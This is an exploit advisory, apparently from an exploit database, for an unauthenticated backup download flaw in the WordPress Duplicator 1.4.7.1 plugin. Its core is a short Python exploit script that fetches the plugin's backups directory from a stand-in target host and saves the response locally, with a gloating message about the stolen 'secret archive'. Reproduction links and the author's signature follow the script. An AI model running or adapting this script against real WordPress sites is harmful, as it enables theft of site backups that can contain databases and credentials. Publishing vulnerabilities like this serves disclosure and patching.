WordPress Duplicator 1.4.7.1 Backup Disclosure

## Title: WordPress Plugin Duplicator 1.4.7.1 - Unauthenticated Backup Download## Author: nu11secur1ty## Date: 08.08.2022## Vendor: https://wordpress.org/## Software: https://wordpress.org/plugins/duplicator/## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin/1.4.7.1## Description:The WordPress Plugin Duplicator 1.4.7.1 suffers from UnauthenticatedBackup Download, after an update from the 1.4.7 version.The attacker can download all archive information from the system byusing this vulnerability!Status: CRITICAL[+] Exploit:```python#!/usr/bin/python# Author nu11secur1tyimport requestsimport timevulnerableURL = "http://pwned_host.com/wordpress/wp-content/backups-dup-lite/"archive=input("Give the name of the archive...\n")response = requests.get(vulnerableURL)time.sleep(5)open(archive, "wb").write(response.content)print("Right now, you just downloaded the secret archive =)\n")```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Duplicator%20%E2%80%93%20WordPress-Migration-Plugin/1.4.7.1)## Proof and Exploit:[href](https://streamable.com/ee11bg)-- System Administrator - Infrastructure EngineerPenetration Testing EngineerExploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/home page: https://www.nu11secur1ty.com/hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=                          nu11secur1ty <http://nu11secur1ty.com/>